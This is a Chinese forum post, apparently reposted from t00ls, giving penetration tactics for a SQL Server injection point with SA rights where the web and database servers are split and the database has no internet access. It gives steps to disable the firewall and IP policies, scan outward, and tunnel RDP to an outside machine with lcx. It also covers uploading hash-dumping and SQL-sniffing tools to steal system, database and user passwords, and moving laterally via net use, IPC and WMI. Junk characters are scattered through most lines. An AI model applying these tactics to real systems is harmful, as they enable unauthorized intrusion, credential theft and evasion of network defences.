当你碰到SA的注入点,可以执行命令,但是web与数据库分离,你都会怎么做呢,当数据库不服务器不能连接外网的时候,是不是只想着从web搞呢,这篇文章从t00ls转载过来,希望对大家sa权限的注入点数据库web分离提供一些渗透思路。; z7 B$ N v( d7 P3 e* B
! X/ G' b( f/ G$ D3 J }
4 y2 i1 X* Z2 T* C$ M. m* a% ?4 v7 b: ~( L
SA点,system权限,可执行命令,web和db分离.DB机器不上网(一般指中马不上线,lcx反弹不出)' i* D# [0 t' n( I, Y' ~
5 J& C3 d" v; |& D' a! e
* [+ L9 j- |# j& u一、DB机有公网IP.
" H# e! E @$ q3 J I4 W$ l
0 Z9 D' ~1 F m- z% |2 L0 z6 M1:执行命令把系统防火墙和ip策略停止,netstat -an找到3389端口尝试连接.
$ u: P- y8 A; r, q1 j& h; w% z, U/ u* ?
- l* C- G% a+ q( U& k
2:从内往外扫描.把命令行下的s扫描器转成vbs传上DB机器生成exe扫描外网一台做了端口策略的机器.这台外网机器开放所有端口.(可以到网上找这 样的 机器.) 如果扫描结果有开放端口,证明在这台DB机可以把3389转到外面机器.比如扫到80 那就lcx -slave ip 80 127.0.0.1 3389.5 C2 F* {% o5 i* `2 @0 [2 v- w
) z! i8 d( ~: `5 B: d" g+ {2 w+ ~3 S% h( J$ m* _
3:尽量多拿密码.用vbs的方法上传gethash,sqlsniffer类的工具.拿到系统和mssql的密 码,数据库表的后台管理员密码,member表的最前几个用户密码.这些密码可以用来测试web后台,web的3389 ftp等.当然事先要对web机器完整扫描一遍. www.2cto.com
/ _4 L" R7 s% ~+ o6 j/ s1 s. R9 ]
3 }5 S9 [2 V7 U( L& R' o& K1 q! U$ c- P* P; ~4 }
4,nmap扫描.用nmap扫描web和db机器的1-65535端口.如果发现db机器显示有closed的端口.那恭喜你,你可以lcx -tran 把3389转发到该端口直接登陆.firewalk也有类似功能.但对代理防火墙无用.7 w- r2 d) Y: U7 o' V: M2 f" v2 ]
' |) c% {. a9 o+ G( j D) o# R
0 o+ M1 X g: h6 G$ Q
3 g Q D$ G6 t6 _二、DB机只有内网IP
2 `! o3 U# n/ Y/ E8 V! K5 _
2 R1 E/ M% q Q! F6 ^" A- o1:尽量多拿密码来net use到web机器.这个过程需要极大的耐心 , 拿密码尝试登陆web后台等.
8 z6 {- m$ f7 O2 ]+ I/ L9 ?/ d, Z: L% g& f& `6 H
}, z- O5 p9 U! H `2:停掉防火墙和IP策略再从内往外扫描.0 ^4 g; Z1 @0 {. |
3 n. G J, e8 m8 P: }) N" W! E* E! A% s; Z- o$ }4 }9 U! t
3: ipconfig /dispalydns如果发现有公网的域名,极大可能是路由做了手脚.机会还是有的.
6 n3 k) `; Q- B5 u) t; F+ d' f' V% }0 n% n9 Z7 `. K/ ]6 D5 M! o
2 N5 ^6 d6 u/ i+ T( i* M
4:学会密码规律分析往往会有惊喜.2 I6 ]; p# h5 S: @7 ^( S
" f# l5 o' V9 b, x
0 ?! B$ K9 F& c( L3 X5,在sa点里执行命令渗透内网,找可上网的机器.isql,ipc共享,wmi等
+ g1 B8 m$ R( ]8 ~& E* f% F' |' V& E" {
! c5 [" {9 ^7 C( X' p t& V1 N
有些地区或国家会禁止别的国家连接一些端口,所以拥有目标国代理或VPN是很重要的 |